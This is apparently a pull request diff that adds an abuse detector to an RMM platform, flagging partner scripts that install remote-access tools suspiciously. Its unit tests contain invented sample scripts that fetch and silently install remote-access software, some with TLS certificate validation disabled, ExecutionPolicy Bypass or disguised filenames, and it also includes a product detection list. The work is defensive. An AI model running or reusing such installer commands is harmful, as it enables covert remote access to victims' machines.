### PR TITLE
feat(api): script-content detector for abuse-signals sweep

### DIFF
--- a/.env.example
+++ b/.env.example
@@ -399,6 +399,9 @@ GRAFANA_ADMIN_PASSWORD=changeme
 # OPS_ALERT_EMAIL=ops@your-domain.example.com
 # OPS_ALERT_LABEL=US
 # ABUSE_SIGNAL_OVERRIDES={"rmm.enrollment_velocity.devices_24h": 25}
+# Script-content detector indicator lists (unset = empty lists; the repo
+# deliberately ships no indicators).
+# ABUSE_SCRIPT_INDICATORS={"tlds": [], "hosts": []}
 
 # --------------------------------------------
 # Application URLs

--- a/apps/api/migrations/2026-07-25-abuse-script-hosts.sql
+++ b/apps/api/migrations/2026-07-25-abuse-script-hosts.sql
@@ -1,0 +1,80 @@
+-- Script-content abuse detection support tables (rmm.remote_access_installer /
+-- rmm.shared_installer_host):
+--   * abuse_script_hosts — cross-partner corpus of download hosts extracted
+--     from script content and execution stdout. The shared-host correlation
+--     intentionally spans ALL partners (including suspended ones), so rows
+--     persist independently of partner status.
+--   * abuse_sweep_state — tiny key/value scan state (high-water mark for the
+--     incremental script_executions stdout scan).
+-- Both are system-scoped: forced RLS with a system-only policy — partners
+-- must never read the host corpus or scan state (it would reveal what the
+-- operator correlates on). All access via withSystemDbAccessContext.
+-- Mirrors 2026-07-13-partner-abuse-signals.sql. Idempotent.
+
+DO $$ BEGIN
+  CREATE TYPE abuse_script_host_source AS ENUM ('script', 'execution');
+EXCEPTION
+  WHEN duplicate_object THEN NULL;
+END $$;
+
+CREATE TABLE IF NOT EXISTS abuse_script_hosts (
+  id            uuid PRIMARY KEY DEFAULT gen_random_uuid(),
+  partner_id    uuid NOT NULL REFERENCES partners(id) ON DELETE CASCADE,
+  host          varchar(255) NOT NULL,
+  source        abuse_script_host_source NOT NULL,
+  script_id     uuid REFERENCES scripts(id) ON DELETE SET NULL,
+  first_seen_at timestamptz NOT NULL DEFAULT now(),
+  last_seen_at  timestamptz NOT NULL DEFAULT now()
+);
+
+CREATE UNIQUE INDEX IF NOT EXISTS abuse_script_hosts_partner_host_source_uq
+  ON abuse_script_hosts(partner_id, host, source);
+
+CREATE INDEX IF NOT EXISTS abuse_script_hosts_host_idx
+  ON abuse_script_hosts(host);
+
+ALTER TABLE abuse_script_hosts ENABLE ROW LEVEL SECURITY;
+ALTER TABLE abuse_script_hosts FORCE ROW LEVEL SECURITY;
+
+DO $$
+BEGIN
+  IF NOT EXISTS (
+    SELECT 1 FROM pg_policies
+    WHERE schemaname = 'public'
+      AND tablename = 'abuse_script_hosts'
+      AND policyname = 'abuse_script_hosts_system_only'
+  ) THEN
+    EXECUTE $POLICY$
+      CREATE POLICY abuse_script_hosts_system_only
+        ON abuse_script_hosts
+        USING (current_setting('breeze.scope', true) = 'system')
+        WITH CHECK (current_setting('breeze.scope', true) = 'system')
+    $POLICY$;
+  END IF;
+END$$;
+
+CREATE TABLE IF NOT EXISTS abuse_sweep_state (
+  key        varchar(64) PRIMARY KEY,
+  value      jsonb NOT NULL DEFAULT '{}',
+  updated_at timestamptz NOT NULL DEFAULT now()
+);
+
+ALTER TABLE abuse_sweep_state ENABLE ROW LEVEL SECURITY;
+ALTER TABLE abuse_sweep_state FORCE ROW LEVEL SECURITY;
+
+DO $$
+BEGIN
+  IF NOT EXISTS (
+    SELECT 1 FROM pg_policies
+    WHERE schemaname = 'public'
+      AND tablename = 'abuse_sweep_state'
+      AND policyname = 'abuse_sweep_state_system_only'
+  ) THEN
+    EXECUTE $POLICY$
+      CREATE POLICY abuse_sweep_state_system_only
+        ON abuse_sweep_state
+        USING (current_setting('breeze.scope', true) = 'system')
+        WITH CHECK (current_setting('breeze.scope', true) = 'system')
+    $POLICY$;
+  END IF;
+END$$;

--- a/apps/api/src/__tests__/integration/rls-coverage.integration.test.ts
+++ b/apps/api/src/__tests__/integration/rls-coverage.integration.test.ts
@@ -4,7 +4,7 @@ import { db, withDbAccessContext, withSystemDbAccessContext } from '../../db';
 import { partners, users, organizations, sites, invoices, invoiceLines, invoiceDocuments, contracts, contractLines, contractBillingPeriods, mlFeedbackEvents, unifiCollectors, unifiDeviceTelemetry, unifiClients } from '../../db/schema';
 import { approvalRequests } from '../../db/schema/approvals';
 import { manifestSigningKeys } from '../../db/schema/manifestSigningKeys';
-import { partnerAbuseSignals } from '../../db/schema/abuseSignals';
+import { partnerAbuseSignals, abuseScriptHosts } from '../../db/schema/abuseSignals';
 import { automations, automationRuns } from '../../db/schema/automations';
 import { configurationPolicies } from '../../db/schema/configurationPolicies';
 import { scripts, scriptExecutionBatches } from '../../db/schema/scripts';
@@ -50,6 +50,8 @@ const EXEMPT_TABLES: ReadonlySet<string> = new Set<string>([
   'manifest_signing_keys',
   'm365_consent_sessions',
   'partner_abuse_signals',
+  'abuse_script_hosts',
+  'abuse_sweep_state',
 ]);
 
 // System-scoped tables: forced RLS with either no permissive policies at all,
@@ -80,6 +82,8 @@ const INTENTIONAL_UNSCOPED: ReadonlySet<string> = new Set<string>([
   'third_party_package_catalog', // System-wide curated catalog of third-party packages; writes gated by platform-admin role at the route layer.
   'third_party_release_tests', // System-wide release test results; references catalog (unscoped) and is platform-admin-only at the route layer.
   'partner_abuse_signals', // Operator abuse signals ABOUT partners. Forced RLS, system-only policy — partners must never see their own risk signals.
+  'abuse_script_hosts', // Cross-partner download-host corpus for the script-content abuse detector. Carries partner_id but is deliberately operator-only (mirrors partner_abuse_signals). Forced RLS, system-only policy.
+  'abuse_sweep_state', // Abuse-sweep scan state (incremental execution-scan high-water mark). No tenant column. Forced RLS, system-only policy.
   'sso_sessions', // Pre-auth SSO CSRF/PKCE transaction store (state/nonce/code_verifier + link binding). No tenant column; written/consumed only by unauthenticated callback + system-context routes. Forced RLS, system-only policy → only system context.
   'installed_extensions', // Global runtime-extension operational state (version/trust/lifecycle/enabled). No tenant axis. Forced RLS, system-only policy → only system context.
   'extension_schema_history', // Global append-only record of the schema-compatibility floor each extension bundle version applied. No tenant axis. Forced RLS, system-only policy → only system context.
@@ -1743,6 +1747,154 @@ describe('partner_abuse_signals RLS — system-only enforcement', () => {
           .select({ id: partnerAbuseSignals.id })
           .from(partnerAbuseSignals)
           .where(eq(partnerAbuseSignals.id, result[0]!.id));
+      });
+      expect(readBack).toHaveLength(1);
+    },
+  );
+});
+
+// ===========================================================================
+// abuse_script_hosts RLS lockout
+//
+// Mirrors the partner_abuse_signals block above: the catalog test only proves
+// abuse_script_hosts is in INTENTIONAL_UNSCOPED as documentation. This block
+// forges as `breeze_app` the specific threat this table exists to prevent —
+// a partner reading the cross-partner download-host corpus (which would
+// reveal what the operator correlates on), including its OWN rows via a
+// partner-scoped context. The system-scope branch confirms the script-content
+// scan write path (services/abuseSignals/scriptContent.ts) still works.
+// ===========================================================================
+describe('abuse_script_hosts RLS — system-only enforcement', () => {
+  const runSuffix = `${Date.now()}-${Math.random().toString(36).slice(2, 8)}`;
+  const partnerSlug = `rls-abuse-hosts-partner-${runSuffix}`;
+
+  let partnerId: string;
+  const insertedHostIds: string[] = [];
+
+  async function ensureFixtures(): Promise<void> {
+    if (partnerId) return;
+    await withSystemDbAccessContext(async () => {
+      const [partner] = await db
+        .insert(partners)
+        .values({
+          name: `RLS Abuse Hosts Partner ${runSuffix}`,
+          slug: partnerSlug,
+          type: 'msp',
+          plan: 'pro',
+          status: 'active',
+        })
+        .returning({ id: partners.id });
+      if (!partner) throw new Error('failed to seed partner for abuse-script-hosts RLS forge test');
+      partnerId = partner.id;
+    });
+  }
+
+  afterAll(async () => {
+    await withSystemDbAccessContext(async () => {
+      for (const id of insertedHostIds) {
+        await db.delete(abuseScriptHosts).where(eq(abuseScriptHosts.id, id));
+      }
+      if (partnerId) await db.delete(partners).where(eq(partners.id, partnerId));
+    });
+  });
+
+  function partnerContext(accessiblePartnerId: string) {
+    return {
+      scope: 'partner' as const,
+      orgId: null,
+      accessibleOrgIds: [],
+      accessiblePartnerIds: [accessiblePartnerId],
+      userId: null,
+    };
+  }
+
+  it.runIf(!!process.env.DATABASE_URL)(
+    'INSERT as breeze_app under a tenant (partner-scoped) context is rejected by RLS',
+    async () => {
+      await ensureFixtures();
+
+      let caught: unknown;
+      try {
+        await withDbAccessContext(partnerContext(partnerId), async () =>
+          db.insert(abuseScriptHosts).values({
+            partnerId,
+            host: `rls-forge-deny-${runSuffix}.invalid`,
+            source: 'script',
+          }),
+        );
+      } catch (err) {
+        caught = err;
+      }
+
+      expect(caught).toBeDefined();
+      const cause = caught as
+        | { cause?: { message?: string }; message?: string }
+        | undefined;
+      const message = cause?.cause?.message ?? cause?.message ?? '';
+      expect(message).toMatch(/row-level security|permission denied/i);
+    },
+  );
+
+  it.runIf(!!process.env.DATABASE_URL)(
+    "SELECT under a partner context matching the row's own partner_id returns zero rows",
+    async () => {
+      await ensureFixtures();
+
+      const seededHost = `rls-forge-seed-${runSuffix}.invalid`;
+      const seeded = await withSystemDbAccessContext(async () => {
+        return db
+          .insert(abuseScriptHosts)
+          .values({ partnerId, host: seededHost, source: 'execution' })
+          .returning({ id: abuseScriptHosts.id });
+      });
+      expect(seeded).toHaveLength(1);
+      insertedHostIds.push(seeded[0]!.id);
+
+      let rows: unknown[] = [];
+      let err: unknown = null;
+      try {
+        rows = await withDbAccessContext(partnerContext(partnerId), async () =>
+          db
+            .select({ id: abuseScriptHosts.id })
+            .from(abuseScriptHosts)
+            .where(eq(abuseScriptHosts.partnerId, partnerId)),
+        );
+      } catch (e) {
+        err = e;
+      }
+
+      if (err) {
+        const cause = err as
+          | { cause?: { message?: string }; message?: string };
+        const message = cause?.cause?.message ?? cause?.message ?? '';
+        expect(message).toMatch(/permission denied|row-level security/i);
+      } else {
+        expect(rows).toEqual([]);
+      }
+    },
+  );
+
+  it.runIf(!!process.env.DATABASE_URL)(
+    'withSystemDbAccessContext INSERT + SELECT round-trips successfully',
+    async () => {
+      await ensureFixtures();
+
+      const host = `rls-forge-system-${runSuffix}.invalid`;
+      const result = await withSystemDbAccessContext(async () => {
+        return db
+          .insert(abuseScriptHosts)
+          .values({ partnerId, host, source: 'script' })
+          .returning({ id: abuseScriptHosts.id, host: abuseScriptHosts.host });
+      });
+      expect(result).toHaveLength(1);
+      expect(result[0]!.host).toBe(host);
+      insertedHostIds.push(result[0]!.id);
+
+      const readBack = await withSystemDbAccessContext(async () => {
+        return db
+          .select({ id: abuseScriptHosts.id })
+          .from(abuseScriptHosts)
+          .where(eq(abuseScriptHosts.id, result[0]!.id));
       });
       expect(readBack).toHaveLength(1);
     },

--- a/apps/api/src/db/schema/abuseSignals.ts
+++ b/apps/api/src/db/schema/abuseSignals.ts
@@ -1,6 +1,7 @@
 import { pgTable, uuid, varchar, timestamp, jsonb, pgEnum, real, index, uniqueIndex } from 'drizzle-orm/pg-core';
 import { sql } from 'drizzle-orm';
 import { partners } from './orgs';
+import { scripts } from './scripts';
 
 export const abuseSignalSeverityEnum = pgEnum('abuse_signal_severity', ['info', 'watch', 'alert']);
 
@@ -26,3 +27,31 @@ export const partnerAbuseSignals = pgTable('partner_abuse_signals', {
   uniqueIndex('partner_abuse_signals_open_uq').on(t.partnerId, t.signalKey).where(sql`resolved_at IS NULL`),
   index('partner_abuse_signals_partner_idx').on(t.partnerId),
 ]);
+
+export const abuseScriptHostSourceEnum = pgEnum('abuse_script_host_source', ['script', 'execution']);
+
+// Cross-partner corpus of download hosts extracted from script content and
+// execution stdout (services/abuseSignals/scriptContent.ts). Deliberately
+// spans ALL partners regardless of status — the shared-host correlation needs
+// suspended partners in the corpus. System-only RLS, same as
+// partner_abuse_signals above: partners must never see the corpus.
+export const abuseScriptHosts = pgTable('abuse_script_hosts', {
+  id: uuid('id').primaryKey().defaultRandom(),
+  partnerId: uuid('partner_id').notNull().references(() => partners.id, { onDelete: 'cascade' }),
+  host: varchar('host', { length: 255 }).notNull(),
+  source: abuseScriptHostSourceEnum('source').notNull(),
+  scriptId: uuid('script_id').references(() => scripts.id, { onDelete: 'set null' }),
+  firstSeenAt: timestamp('first_seen_at', { withTimezone: true }).defaultNow().notNull(),
+  lastSeenAt: timestamp('last_seen_at', { withTimezone: true }).defaultNow().notNull(),
+}, (t) => [
+  uniqueIndex('abuse_script_hosts_partner_host_source_uq').on(t.partnerId, t.host, t.source),
+  index('abuse_script_hosts_host_idx').on(t.host),
+]);
+
+// Tiny key/value scan state for the abuse sweep (e.g. the incremental
+// script_executions stdout scan high-water mark). System-only RLS.
+export const abuseSweepState = pgTable('abuse_sweep_state', {
+  key: varchar('key', { length: 64 }).primaryKey(),
+  value: jsonb('value').notNull().default({}),
+  updatedAt: timestamp('updated_at', { withTimezone: true }).defaultNow().notNull(),
+});

--- a/apps/api/src/services/abuseSignals/config.ts
+++ b/apps/api/src/services/abuseSignals/config.ts
@@ -21,6 +21,24 @@ export const SIGNAL_DEFAULTS = {
   'resource.enrollment_denied.count_24h': 20,
   'resource.volume_outlier.commands_24h': 500,
   'resource.volume_outlier.scripts_24h': 200,
+  // Script-content detector (scriptContent.ts). Gate alone (remote-access
+  // product + install/fetch primitive) is what an RMM does, so it scores
+  // below watch; corroborating markers are additive on top, clamped at 100.
+  // NONE of these are age-decayed — a malicious installer is malicious
+  // regardless of account age.
+  'rmm.remote_access_installer.gate_score': 20,
+  'rmm.remote_access_installer.marker.tls_bypass': 70,
+  'rmm.remote_access_installer.marker.shared_host': 60,
+  'rmm.remote_access_installer.marker.indicator_host': 60,
+  'rmm.remote_access_installer.marker.throwaway_tld': 50,
+  'rmm.remote_access_installer.marker.bare_ip_port': 50,
+  'rmm.remote_access_installer.marker.misleading_filename': 45,
+  'rmm.remote_access_installer.marker.unrelated_host': 25,
+  'rmm.remote_access_installer.marker.exec_policy_bypass': 20,
+  'rmm.remote_access_installer.marker.unattended_params': 15,
+  'rmm.shared_installer_host.min_partners': 2,
+  'rmm.shared_installer_host.base_score': 60,
+  'rmm.shared_installer_host.per_extra_partner': 20,
 } as const satisfies Record<string, number>;
 
 export type SignalConfigKey = keyof typeof SIGNAL_DEFAULTS;

--- a/apps/api/src/services/abuseSignals/index.ts
+++ b/apps/api/src/services/abuseSignals/index.ts
@@ -5,6 +5,7 @@ import { recordAbuseSignalFired } from '../abuseMetrics';
 import { loadSignalConfig } from './config';
 import { computeInvariantSignals } from './invariants';
 import { loadPartnerAggregates, computeHeuristicSignals } from './heuristics';
+import { loadScriptFindings, computeScriptSignals, loadScriptIndicators } from './scriptContent';
 import { persistSignals, markDelivered } from './persistence';
 import type { ComputedSignal } from './types';
 
@@ -45,13 +46,26 @@ export async function runAbuseSweep(): Promise<{ fired: number; notified: number
   const cfg = loadSignalConfig();
   const now = new Date();
 
-  const { invariants, aggregates } = await runSystemDbCompute(async () => ({
+  const { invariants, aggregates, scriptFindings } = await runSystemDbCompute(async () => ({
     invariants: await computeInvariantSignals(),
     aggregates: await loadPartnerAggregates(),
+    scriptFindings: await loadScriptFindings(now),
   }));
 
-  const computed = [...invariants, ...computeHeuristicSignals(aggregates, cfg, now)];
-  const evaluatedPartnerIds = new Set(aggregates.map((a) => a.partnerId));
+  const computed = [
+    ...invariants,
+    ...computeHeuristicSignals(aggregates, cfg, now),
+    // Content-based signals are never age-decayed (computeScriptSignals takes
+    // no partner age at all) — a malicious installer is malicious regardless
+    // of account age.
+    ...computeScriptSignals(scriptFindings.findings, scriptFindings.sharedHosts, cfg, loadScriptIndicators()),
+  ];
+  // Script-scanned partners join the evaluated set so open script-signal rows
+  // stale-resolve when the evidence disappears (script edited/deleted).
+  const evaluatedPartnerIds = new Set([
+    ...aggregates.map((a) => a.partnerId),
+    ...scriptFindings.scannedPartnerIds,
+  ]);
   const { toNotify } = await runSystemDbCompute(() => persistSignals(computed, now, evaluatedPartnerIds));
 
   for (const s of computed) recordAbuseSignalFired(s.severity);

--- a/apps/api/src/services/abuseSignals/scriptContent.test.ts
+++ b/apps/api/src/services/abuseSignals/scriptContent.test.ts
@@ -1,0 +1,269 @@
+import { describe, it, expect, afterEach, vi } from 'vitest';
+import {
+  computeScriptSignals,
+  extractHosts,
+  loadScriptIndicators,
+  type ScriptFinding,
+  type ScriptIndicators,
+} from './scriptContent';
+import { SIGNAL_DEFAULTS } from './config';
+import type { ComputedSignal } from './types';
+
+// All fixture data below is invented (reserved .test/.example TLDs and
+// RFC 5737 documentation IP ranges) — never real tenants, hosts, or IPs.
+
+const cfg = SIGNAL_DEFAULTS;
+const noIndicators: ScriptIndicators = { tlds: [], hosts: [] };
+const noShared = new Map<string, number>();
+
+function finding(overrides: Partial<ScriptFinding>): ScriptFinding {
+  return {
+    partnerId: 'partner-fixture-a',
+    partnerName: 'Acme IT Services',
+    partnerEmailDomain: 'acmeit.example',
+    scriptId: 'script-fixture-1',
+    scriptContent: '',
+    executionStdouts: [],
+    persistedHosts: [],
+    ...overrides,
+  };
+}
+
+function installerSignal(signals: ComputedSignal[], partnerId = 'partner-fixture-a'): ComputedSignal | undefined {
+  return signals.find((s) => s.signalKey === 'rmm.remote_access_installer' && s.partnerId === partnerId);
+}
+
+describe('computeScriptSignals — positives', () => {
+  it('gate + TLS validation bypass scores >= 90 (alert)', () => {
+    const f = finding({
+      scriptContent: [
+        '$wc = New-Object System.Net.WebClient',
+        '[System.Net.ServicePointManager]::ServerCertificateValidationCallback = { $true }',
+        '$wc.DownloadFile("https://acmeit.screenconnect.test/Bin/ScreenConnect.ClientSetup.msi", "ScreenConnect.msi")',
+        'msiexec /i ScreenConnect.msi /qn',
+      ].join('\n'),
+    });
+    const signals = computeScriptSignals([f], noShared, cfg, noIndicators);
+    const s = installerSignal(signals);
+    expect(s).toBeDefined();
+    expect(s!.score).toBeGreaterThanOrEqual(90);
+    expect(s!.severity).toBe('alert');
+    expect(s!.evidence.markers).toContain('tls_bypass');
+    // Evidence stays compact: no script bodies.
+    expect(JSON.stringify(s!.evidence)).not.toContain('DownloadFile');
+  });
+
+  it('gate + throwaway TLD (injected list) + misleading filename clamps at 100', () => {
+    const indicators: ScriptIndicators = { tlds: ['testtld'], hosts: [] };
+    const f = finding({
+      scriptContent: [
+        '# deploy anydesk for remote support',
+        'Invoke-WebRequest -Uri "https://cdn.dl-fixture.testtld/pkg/agentfile" -OutFile "PhotoViewer.msi"',
+        'msiexec /i PhotoViewer.msi /quiet',
+      ].join('\n'),
+    });
+    const signals = computeScriptSignals([f], noShared, cfg, indicators);
+    const s = installerSignal(signals);
+    expect(s).toBeDefined();
+    expect(s!.score).toBe(100);
+    expect(s!.severity).toBe('alert');
+    expect(s!.evidence.markers).toContain('throwaway_tld');
+    expect(s!.evidence.markers).toContain('misleading_filename');
+  });
+
+  it('gate + bare IP:port URL + -ExecutionPolicy Bypass reaches alert', () => {
+    const f = finding({
+      scriptContent:
+        'powershell -ExecutionPolicy Bypass -Command "iwr http://192.0.2.10:8040/rustdesk-host.msi -OutFile rustdesk.msi; msiexec /i rustdesk.msi /VERYSILENT"',
+    });
+    const signals = computeScriptSignals([f], noShared, cfg, noIndicators);
+    const s = installerSignal(signals);
+    expect(s).toBeDefined();
+    expect(s!.score).toBe(90);
+    expect(s!.severity).toBe('alert');
+    expect(s!.evidence.markers).toEqual(expect.arrayContaining(['bare_ip_port', 'exec_policy_bypass']));
+  });
+
+  it('scores a host that appears ONLY in execution stdout (execution path)', () => {
+    const f = finding({
+      scriptContent: 'Write-Output "Deploying AnyDesk"\nmsiexec /qn /i $installer',
+      executionStdouts: ['Downloading http://192.0.2.55:9001/pkg.msi ...\nInstall complete'],
+    });
+    const signals = computeScriptSignals([f], noShared, cfg, noIndicators);
+    const s = installerSignal(signals);
+    expect(s).toBeDefined();
+    expect(s!.evidence.markers).toContain('bare_ip_port');
+    expect(s!.score).toBe(70);
+    expect(s!.severity).toBe('alert');
+  });
+
+  it('scores a known-bad host from the injected indicator list', () => {
+    const indicators: ScriptIndicators = { tlds: [], hosts: ['bad-host.fixture.test'] };
+    const f = finding({
+      scriptContent: 'iwr https://bad-host.fixture.test/teamviewer_setup.msi -OutFile tv.msi; msiexec /i tv.msi /quiet',
+    });
+    const signals = computeScriptSignals([f], noShared, cfg, indicators);
+    const s = installerSignal(signals);
+    expect(s).toBeDefined();
+    expect(s!.evidence.markers).toContain('indicator_host');
+    expect(s!.severity).toBe('alert');
+  });
+
+  it('emits shared_installer_host for both partners on a cross-partner shared host', () => {
+    const shared = new Map([['shared-dl.fixture-host.test', 2]]);
+    const content =
+      'Invoke-WebRequest https://shared-dl.fixture-host.test/agent.msi -OutFile sc.msi; msiexec /i sc.msi /qn # ScreenConnect';
+    const a = finding({ scriptContent: content });
+    const b = finding({
+      partnerId: 'partner-fixture-b',
+      partnerName: 'Beta Managed Fixture',
+      partnerEmailDomain: 'betamanaged.example',
+      scriptId: 'script-fixture-2',
+      scriptContent: content,
+    });
+    const signals = computeScriptSignals([a, b], shared, cfg, noIndicators);
+
+    for (const partnerId of ['partner-fixture-a', 'partner-fixture-b']) {
+      const sharedSignal = signals.find(
+        (s) => s.signalKey === 'rmm.shared_installer_host' && s.partnerId === partnerId,
+      );
+      expect(sharedSignal).toBeDefined();
+      expect(sharedSignal!.score).toBe(60);
+      expect(sharedSignal!.severity).toBe('watch');
+      expect(sharedSignal!.evidence.host).toBe('shared-dl.fixture-host.test');
+
+      const installer = installerSignal(signals, partnerId);
+      expect(installer).toBeDefined();
+      expect(installer!.evidence.markers).toContain('shared_host');
+      expect(installer!.severity).toBe('alert');
+    }
+  });
+
+  it('takes the MAX across a partner\'s scripts (one installer signal per partner)', () => {
+    const benign = finding({
+      scriptId: 'script-fixture-benign',
+      scriptContent: 'iwr https://acmeit.screenconnect.test/Bin/x.msi -OutFile ScreenConnect.msi; msiexec /i ScreenConnect.msi /qn',
+    });
+    const bad = finding({
+      scriptId: 'script-fixture-bad',
+      scriptContent:
+        'ServerCertificateValidationCallback\niwr https://acmeit.screenconnect.test/Bin/x.msi -OutFile ScreenConnect.msi; msiexec /i ScreenConnect.msi /qn',
+    });
+    const signals = computeScriptSignals([benign, bad], noShared, cfg, noIndicators);
+    const installers = signals.filter((s) => s.signalKey === 'rmm.remote_access_installer');
+    expect(installers).toHaveLength(1);
+    expect(installers[0]!.score).toBe(90);
+    expect(installers[0]!.evidence.scriptId).toBe('script-fixture-bad');
+  });
+});
+
+describe('computeScriptSignals — negatives (must not reach alert)', () => {
+  it('own vendor instance install scores exactly the gate (20)', () => {
+    const f = finding({
+      scriptContent:
+        'Invoke-WebRequest "https://acmeit.screenconnect.test/Bin/ScreenConnect.ClientSetup.msi" -OutFile ScreenConnect.ClientSetup.msi\nmsiexec /i ScreenConnect.ClientSetup.msi /qn',
+    });
+    const signals = computeScriptSignals([f], noShared, cfg, noIndicators);
+    const s = installerSignal(signals);
+    expect(s).toBeDefined();
+    expect(s!.score).toBe(20);
+    expect(s!.severity).toBe('info');
+  });
+
+  it('vendor-domain silent install scores exactly the gate (20)', () => {
+    const f = finding({
+      scriptContent: 'iwr https://dl.screenconnect.test/latest/setup.msi -OutFile setup.msi; msiexec /i setup.msi /quiet',
+    });
+    const signals = computeScriptSignals([f], noShared, cfg, noIndicators);
+    const s = installerSignal(signals);
+    expect(s).toBeDefined();
+    expect(s!.score).toBe(20);
+    expect(s!.severity).toBe('info');
+  });
+
+  it('own instance + unattended-access params stays at 35 (info)', () => {
+    const f = finding({
+      scriptContent:
+        'iwr "https://acmeit.screenconnect.test/Bin/ScreenConnect.ClientSetup.msi?e=Access&y=Guest" -OutFile ScreenConnect.msi; msiexec /i ScreenConnect.msi /qn',
+    });
+    const signals = computeScriptSignals([f], noShared, cfg, noIndicators);
+    const s = installerSignal(signals);
+    expect(s).toBeDefined();
+    expect(s!.score).toBe(35);
+    expect(s!.severity).toBe('info');
+  });
+
+  it('foreign vendor-instance host + unattended + unrelated partner name is watch (60), not alert', () => {
+    const f = finding({
+      partnerName: 'Zenith Networks Fixture',
+      partnerEmailDomain: 'zenithnetworks.example',
+      scriptContent:
+        'iwr "https://brightpath.screenconnect.test/Bin/ScreenConnect.ClientSetup.msi?e=Access&y=Guest" -OutFile ScreenConnect.msi; msiexec /i ScreenConnect.msi /qn',
+    });
+    const signals = computeScriptSignals([f], noShared, cfg, noIndicators);
+    const s = installerSignal(signals);
+    expect(s).toBeDefined();
+    expect(s!.score).toBe(60);
+    expect(s!.severity).toBe('watch');
+    expect(s!.evidence.markers).toEqual(expect.arrayContaining(['unrelated_host', 'unattended_params']));
+  });
+
+  it('a non-remote-access install script produces no signal at all', () => {
+    const f = finding({
+      scriptContent: 'winget install --silent FixtureVendor.NotesApp\nchoco install fixture-notes -y',
+    });
+    expect(computeScriptSignals([f], noShared, cfg, noIndicators)).toEqual([]);
+  });
+
+  it('a quiet fleet emits nothing', () => {
+    expect(computeScriptSignals([], noShared, cfg, noIndicators)).toEqual([]);
+  });
+});
+
+describe('extractHosts', () => {
+  it('extracts lowercased authorities (with port) and strips userinfo and trailing punctuation', () => {
+    const hosts = extractHosts(
+      'See HTTPS://User:Pw@Dl.Fixture-Host.TEST:8443/path and http://192.0.2.7:9001/x. Done.',
+    );
+    expect(hosts).toEqual(expect.arrayContaining(['dl.fixture-host.test:8443', '192.0.2.7:9001']));
+  });
+
+  it('returns nothing for text without URLs', () => {
+    expect(extractHosts('no urls here')).toEqual([]);
+  });
+});
+
+describe('loadScriptIndicators', () => {
+  afterEach(() => {
+    delete process.env.ABUSE_SCRIPT_INDICATORS;
+    vi.restoreAllMocks();
+  });
+
+  it('defaults to EMPTY lists when unset (repo ships no indicators)', () => {
+    expect(loadScriptIndicators()).toEqual({ tlds: [], hosts: [] });
+  });
+
+  it('parses tlds and hosts, lowercased', () => {
+    process.env.ABUSE_SCRIPT_INDICATORS = '{"tlds": ["TESTTLD"], "hosts": ["Bad-Host.Fixture.TEST"]}';
+    expect(loadScriptIndicators()).toEqual({ tlds: ['testtld'], hosts: ['bad-host.fixture.test'] });
+  });
+
+  it('warns and returns empty lists on malformed JSON', () => {
+    const warn = vi.spyOn(console, 'warn').mockImplementation(() => {});
+    process.env.ABUSE_SCRIPT_INDICATORS = '{not json';
+    expect(loadScriptIndicators()).toEqual({ tlds: [], hosts: [] });
+    expect(warn).toHaveBeenCalled();
+  });
+
+  it('warns and returns empty lists on non-object JSON', () => {
+    const warn = vi.spyOn(console, 'warn').mockImplementation(() => {});
+    process.env.ABUSE_SCRIPT_INDICATORS = '["nope"]';
+    expect(loadScriptIndicators()).toEqual({ tlds: [], hosts: [] });
+    expect(warn).toHaveBeenCalled();
+  });
+
+  it('ignores non-string entries', () => {
+    process.env.ABUSE_SCRIPT_INDICATORS = '{"tlds": [1, "testtld", null], "hosts": "not-a-list"}';
+    expect(loadScriptIndicators()).toEqual({ tlds: ['testtld'], hosts: [] });
+  });
+});

--- a/apps/api/src/services/abuseSignals/scriptContent.ts
+++ b/apps/api/src/services/abuseSignals/scriptContent.ts
@@ -1,0 +1,583 @@
+import { sql } from 'drizzle-orm';
+import { db } from '../../db';
+import { abuseScriptHosts } from '../../db/schema';
+import { scoreToSeverity, type SignalConfig } from './config';
+import type { ComputedSignal } from './types';
+
+// ---------------------------------------------------------------------------
+// Script-content detector: rmm.remote_access_installer / rmm.shared_installer_host
+//
+// Contract (same as heuristics.ts): loadScriptFindings() does bounded SQL and
+// host persistence; computeScriptSignals() is pure and unit-tested. Signals
+// here are NEVER age-decayed — a malicious installer is malicious regardless
+// of account age — so the pure scorer deliberately never sees
+// partnerCreatedAt / youngWeight().
+//
+// Cross-tenant corpus rule: hosts are extracted and persisted for ALL
+// partners regardless of status (the shared-host correlation needs suspended
+// partners in the corpus), but findings — and therefore signals — are only
+// attributed to active, non-deleted partners.
+// ---------------------------------------------------------------------------
+
+interface RaProduct {
+  name: string;
+  pattern: RegExp;
+  /** Lowercase tokens used for filename/vendor-host relatedness checks. */
+  tokens: string[];
+}
+
+// Stage-1 gate, part A: the script must mention a remote-access product...
+const RA_PRODUCTS: ReadonlyArray<RaProduct> = [
+  { name: 'ScreenConnect', pattern: /screen ?connect/i, tokens: ['screenconnect', 'connectwise', 'control'] },
+  { name: 'ConnectWise Control', pattern: /connectwise ?control/i, tokens: ['connectwise', 'screenconnect', 'control'] },
+  { name: 'AnyDesk', pattern: /anydesk/i, tokens: ['anydesk'] },
+  { name: 'TeamViewer', pattern: /teamviewer/i, tokens: ['teamviewer'] },
+  { name: 'Splashtop', pattern: /splashtop/i, tokens: ['splashtop'] },
+  { name: 'RustDesk', pattern: /rustdesk/i, tokens: ['rustdesk'] },
+  { name: 'Supremo', pattern: /\bsupremo\b/i, tokens: ['supremo'] },
+  { name: 'UltraViewer', pattern: /ultraviewer/i, tokens: ['ultraviewer'] },
+  { name: 'LogMeIn', pattern: /logmein/i, tokens: ['logmein'] },
+  { name: 'GoToAssist', pattern: /goto ?assist/i, tokens: ['gotoassist', 'goto'] },
+  { name: 'Zoho Assist', pattern: /zoho ?assist/i, tokens: ['zoho', 'assist'] },
+  { name: 'DWAgent', pattern: /\bdwagent\b/i, tokens: ['dwagent', 'dwservice'] },
+  { name: 'MeshAgent', pattern: /mesh ?agent|mesh ?central/i, tokens: ['meshagent', 'meshcentral', 'mesh'] },
+  { name: 'Atera', pattern: /\batera\b/i, tokens: ['atera'] },
+  { name: 'Action1', pattern: /\baction1\b/i, tokens: ['action1'] },
+];
+
+// SQL-side prefilter mirroring RA_PRODUCTS — keeps the candidate row count
+// bounded before any text leaves Postgres. \y = PG word boundary.
+const RA_PRODUCT_SQL_RE =
+  'screen ?connect|connectwise ?control|anydesk|teamviewer|splashtop|rustdesk|\\ysupremo\\y|ultraviewer|logmein|goto ?assist|zoho ?assist|\\ydwagent\\y|mesh ?agent|mesh ?central|\\yatera\\y|\\yaction1\\y';
+
